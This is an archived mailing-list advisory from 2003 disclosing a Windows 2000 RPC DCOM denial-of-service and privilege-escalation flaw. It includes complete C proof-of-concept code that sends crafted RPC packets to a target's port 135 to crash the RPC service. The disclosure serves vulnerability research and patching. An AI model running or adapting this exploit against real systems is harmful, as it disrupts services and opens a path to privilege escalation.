lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <00a401c34fa0$2b842cb0$1e00a8c0@homedudu>
From: benjurry at xfocus.org (benjurry)
Subject: Microsoft Windows 2000 RPC DCOM Interface DOS AND  Privilege Escalation Vulnerability

Microsoft Windows 2000 RPC DCOM Interface DOS AND  Privilege Escalation Vulnerability

1.Description:
  There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP. The failure results because of incorrect handling of malformed messages. 
 By sending a messages to DCOM __RemoteGetClassObject interface,The RPC Service will be crashed,and all service and application  depending on RPC service will be abnormal.
 The reason for this is that __RemoteGetClassObject intface passed a NULL point to PerformScmStage Function;
 If attacker have an account ,he can hijack epmapper pipe and 135 port Privilege Escalation after RPC service is crash. 

2.Affected Systems:Windows 2000 +SP3
                   Windows 2000 +SP4+MS03-026 HotFix

  
3.Proof of concept codes:
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};



void main(int argc,char ** argv)
{
    WSADATA WSAData;
 int i;
    SOCKET sock;
    SOCKADDR_IN addr_in;
 
 short port=135;
 unsigned char buf1[0x1000];
 printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n");
 printf("Code by FlashSky,Flashsky@...cus.org,benjurry,benjurry@...cus.org\n");
 printf("Welcome to http://www.xfocus.net\n");
 if(argc<2)
 {
  printf("useage:%s target\n",argv[0]);
exit(1);
 }


    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
 
 if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return;
    }
 if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
 {
  printf("Connect failed.Error:%d",WSAGetLastError());
  return;
 }
 if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
 {
   printf("Send failed.Error:%d\n",WSAGetLastError());
   return;
 }

 i=recv(sock,buf1,1024,MSG_PEEK);
 if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)
 {
   printf("Send failed.Error:%d\n",WSAGetLastError());
   return;
 }
 i=recv(sock,buf1,1024,MSG_PEEK);
}

4.Author:flashsky@...cus.org
  e-mail:
   fangxing@...ustech.com.cn
   flashsky@...cus.org

Thanks Benjerry@...cus.org for testing  and translation.

Welcome visit our www site:
   http://www.xfocus.org
   http://www.venustech.com.cn

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ